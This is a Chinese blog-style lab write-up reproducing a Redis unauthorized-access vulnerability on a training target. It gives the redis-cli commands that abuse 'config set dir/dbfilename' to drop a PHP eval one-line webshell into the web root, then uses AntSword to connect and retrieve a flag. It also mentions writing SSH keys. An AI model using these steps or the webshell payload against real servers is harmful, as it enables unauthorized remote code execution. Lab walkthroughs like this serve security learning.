redis未授权访问漏洞复现

一,漏洞介绍

攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器
漏洞的产生条件有以下两点:

(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网

(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务

二,漏洞复现

1,打开kali虚拟机,安装redis-cli远程连接工具
wget http://download.redis.io/redis-stable.tar.gz
tar -zxvf redis-stable.tar.gz
cd redis-stable
make
cp src/redis-cli /usr/bin/

2,测试目标网站

-h 目标url地址 -p redis端口号
redis-cli -h lqm2mltk.lab.aqlab.cn -p 6379

输入ping返回PONG则成功连通,输入info即可查看redis信息

3,利用config写webshell

写入目录地址config set dir /var/www/html

webshell文件名config set dbfilename aaa.php

写入一句话木马(写入文件内容时添加几个换行,是因为redis写入文件时会自带一些版本信息,若不换行可能会导致木马无法正常执行)
set webshell "\r\n\r\n<?php phpinfo();eval(@$_POST['ydop']);?>\r\n\r\n"

保存save退出exit

访问webshell地址,ok 成功

(ps:昨晚木马已经写入了,连接的时候突然有这个连接认证,网上搜了一堆资料还以为是我木马写错导致的,今天才知道原来是管理员弄得认证)账号密码:zkaq

4,使用webshell管理工具连接木马

访问webshell时会认证,输入正确的账号密码才能访问

抓包发现,关键字是这一串 Authorization,删除掉这个值则无法访问

我用的是中国蚁剑,因为添加请求头更方便

输入木马地址

输入cookie值,连接

终于

查找flag

没错,flag就在这里

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

相关推荐
BTU_YC8 小时前
Neo4j查询计划完全指南:读懂数据库的“执行蓝图“
数据库·neo4j
非极限码农8 小时前
Neo4j图数据库上手指南
大数据·数据库·数据分析·neo4j
mit6.8248 小时前
[C# starter-kit] 命令/查询职责分离CQRS | MediatR |
java·数据库·c#
苏打水com9 小时前
数据库进阶实战:从性能优化到分布式架构的核心突破
数据库·后端
shan~~10 小时前
linux达梦数据库操作
linux·数据库·chrome
武文斌7710 小时前
项目学习总结:LVGL图形参数动态变化、开发板的GDB调试、sqlite3移植、MQTT协议、心跳包
linux·开发语言·网络·arm开发·数据库·嵌入式硬件·学习
CoderIsArt10 小时前
SQLite架构
数据库·sqlite
lixora11 小时前
银河麒麟高级服务器操作系统(ADM64 版)V10(SP1)搭建 Oracle 19c RAC
数据库
郝学胜-神的一滴11 小时前
使用Linux的read和write系统函数操作文件
linux·服务器·开发语言·数据库·c++·程序人生·软件工程
哲Zheᗜe༘11 小时前
了解学习MySQL数据库基础
数据库·学习·mysql